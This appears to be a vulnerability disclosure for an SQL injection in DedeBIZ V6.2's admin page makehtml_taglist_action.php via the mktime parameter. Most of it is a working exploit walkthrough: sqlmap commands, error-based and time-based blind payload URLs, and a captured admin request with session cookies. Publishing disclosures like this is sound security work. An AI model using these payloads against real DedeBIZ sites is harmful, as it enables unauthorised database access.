SQL injection vulnerability exists in DedeBIZ V6.2 in /src/admin/makehtml_taglist_action.php

[yhy217]

[Suggested description]
SQL injection vulnerability exists in DedeBIZ V6.2 in /src/admin/makehtml_taglist_action.php

[Vulnerability Type]
SQL INJECTION

[Vendor of Product]
https://github.com/DedeBIZ/DedeV6

[Affected Product Code Base]
DedeBIZ V6.2

[Affected Component]
File： /src/admin/makehtml_taglist_action.php
Parameter： mktime
python sqlmap.py -r sql.txt --current-db

Parameter: #1* (URI)
    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: http://localhost:8086/admin/makehtml_taglist_action.php?maxpagesize=50&tagid=0&pageno=0&upall=1&ctagid=0&startid=0&endid=0&mktime=1 AND GTID_SUBSET(CONCAT(0x716b787871,(SELECT (ELT(2192=2192,1))),0x716b7a6a71),2192)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: http://localhost:8086/admin/makehtml_taglist_action.php?maxpagesize=50&tagid=0&pageno=0&upall=1&ctagid=0&startid=0&endid=0&mktime=1 AND (SELECT 9884 FROM (SELECT(SLEEP(5)))NySf)

[Attack Type]
Remote

[Vulnerability demonstration]
1.After logging in the website backend as the administrator,access
http://localhost:8086/admin/makehtml_taglist_action.php?maxpagesize=50&tagid=0&pageno=0&upall=1&ctagid=0&startid=0&endid=0&mktime=if(length(database())%3E0,sleep(3),1)
it is found that there is truely delay when accessing.

payload:http://localhost:8086/admin/makehtml_taglist_action.php?maxpagesize=50&tagid=0&pageno=0&upall=1&ctagid=0&startid=0&endid=0&mktime=if(length(database())%3E0,sleep(3),1)

2.In order to improve the success rate of injection, the -r command is used here to specify the packet file for injection.Access http://localhost:8086/admin/makehtml_taglist_action.php?maxpagesize=50&tagid=0&pageno=0&upall=1&ctagid=0&startid=0&endid=0&mktime=1*
and use burpsuite to capture the data package.Copy the captured data package into sql.txt in the sqlmap directory.
the captured data package:

GET http://localhost:8086/admin/makehtml_taglist_action.php?maxpagesize=50&tagid=0&pageno=0&upall=1&ctagid=0&startid=0&endid=0&mktime=1* HTTP/1.1
Host: localhost:8086
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=3r1etgf62m34mf1kqqt8r3pfi6; DedeUserID=1; DedeUserID__ckMd5=b55b6fbf67e0257e; DedeLoginTime=1695266280; DedeLoginTime__ckMd5=29e695100a28380a; DedeStUUID=7bf8a37cf0ee8; DedeStUUID__ckMd5=da06278b80034043; ENV_GOBACK_URL=%2Fadmin%2Fmedia_main.php%3Fdopost%3Dfilemanager; dede_csrf_token=4783a6797f09a7b01ff937bcfa0a67fe; dede_csrf_token__ckMd5=572271cba8e1bb9b
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1

3.run the command python sqlmap.py -r sql.txt --risk=3 --level=5 --current-db in sqlmap.After the probe,it is found that there is SQL injection at parameter mktime and obtain the name of current database.

[Cause of vulnerability]
/src/admin/tags_main.php,the user can control the value of the parameter $mktime and the system does not validate the
validity of the user's input.So there is possibility of sql injection.